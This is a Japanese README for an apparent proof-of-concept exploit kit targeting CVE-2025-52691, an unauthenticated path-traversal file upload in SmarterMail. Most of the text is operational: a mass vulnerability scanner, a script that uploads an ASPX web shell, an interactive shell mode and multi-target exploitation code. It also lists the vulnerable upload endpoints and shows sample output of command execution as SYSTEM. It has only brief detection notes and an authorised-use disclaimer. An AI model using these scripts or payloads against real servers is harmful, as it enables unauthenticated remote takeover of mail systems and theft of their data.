
CVE-2025-52691 の概念実証 - SmarterMail の未認証の任意ファイルアップロード RCE
許可されたセキュリティテストおよび教育目的のみに使用してください。 不正アクセスは違法です。
SmarterMail における重大な脆弱性で、パストラバーサルによる未認証の任意ファイルアップロードを可能にし、リモートコード実行に至ります。
脆弱性: アップロードエンドポイントのパストラバーサルにより、Web ルートに ASPX ウェブシェルをアップロード可能
影響: 未認証のリモートコード実行
ベクトル: ネットワーク / 未認証
git clone https://github.com/yourusername/CVE-2025-52691-POC.git
cd CVE-2025-52691-POC
pip install requests urllib3
CVE-2025-52691 の脆弱性を持つターゲットをスキャンします。脆弱性のある URL のみを出力ファイルに保存します。
# Single target
python check.py https://mail.example.com
# Multiple targets
python check.py -f targets.txt -o results.txt
# Custom timeout
python check.py https://mail.example.com -t 30
出力: results.txt に 1 行あたり 1 つの脆弱性 URL
ASPX ウェブシェルをアップロードし、コマンド実行を提供します。
# Basic exploit
python pwn.py https://mail.example.com
# Execute command
python pwn.py https://mail.example.com -c "whoami"
# Interactive shell
python pwn.py https://mail.example.com -i
カスタムスクリプトに統合するための再利用可能なエクスプロイトモジュール。
ライブラリとして:
from exploit import SmarterMailExploit, TargetConfig, ExploitResult
# Basic usage
config = TargetConfig(base_url="https://mail.example.com")
exploit = SmarterMailExploit(config)
if exploit.exploit() == ExploitResult.SHELL_UPLOADED:
print(exploit.execute_command("whoami"))
# With custom timeout
config = TargetConfig(base_url="https://mail.example.com", timeout=60)
exploit = SmarterMailExploit(config)
result = exploit.exploit()
# Execute multiple commands
if result == ExploitResult.SHELL_UPLOADED:
print(exploit.execute_command("whoami"))
print(exploit.execute_command("hostname"))
print(exploit.execute_command("ipconfig"))
スタンドアロンスクリプトとして:
# Import and run in Python
python -c "from exploit import *; e=SmarterMailExploit(TargetConfig('https://mail.example.com')); e.exploit()"
# Create custom script
cat << 'EOF' > my_exploit.py
from exploit import SmarterMailExploit, TargetConfig, ExploitResult
targets = ['https://mail1.example.com', 'https://mail2.example.com']
for target in targets:
config = TargetConfig(base_url=target)
exploit = SmarterMailExploit(config)
if exploit.exploit() == ExploitResult.SHELL_UPLOADED:
print(f"[+] Exploited: {target}")
print(exploit.execute_command("whoami"))
EOF
python my_exploit.py
脆弱なエンドポイント:
/api/upload
/api/v1/upload
/Interface/Frmx/UploadFile.aspx
/MRS/Upload.ashx
/Services/Upload.ashx
攻撃方法:
../wwwroot/) を使用したマルチパートフォームアップロードウェブシェル: ?cmd= パラメータでコマンドを受け付ける最小限の ASPX シェル
python check.py <target>python pwn.py <target> -i検出:
../) を確認/api/upload リクエストをアラート緩和策:
$ python pwn.py https://mail.example.com -c "whoami"
[*] Target: https://mail.example.com
[+] Target is alive
[*] Shell filename: s4a7b3c2.aspx
[*] Attempting to upload webshell...
[+] SUCCESS! Webshell uploaded
[+] Shell URL: https://mail.example.com/s4a7b3c2.aspx
[*] Executing: whoami
[+] Output:
nt authority\system
テスト前に必ず適切な許可を取得してください。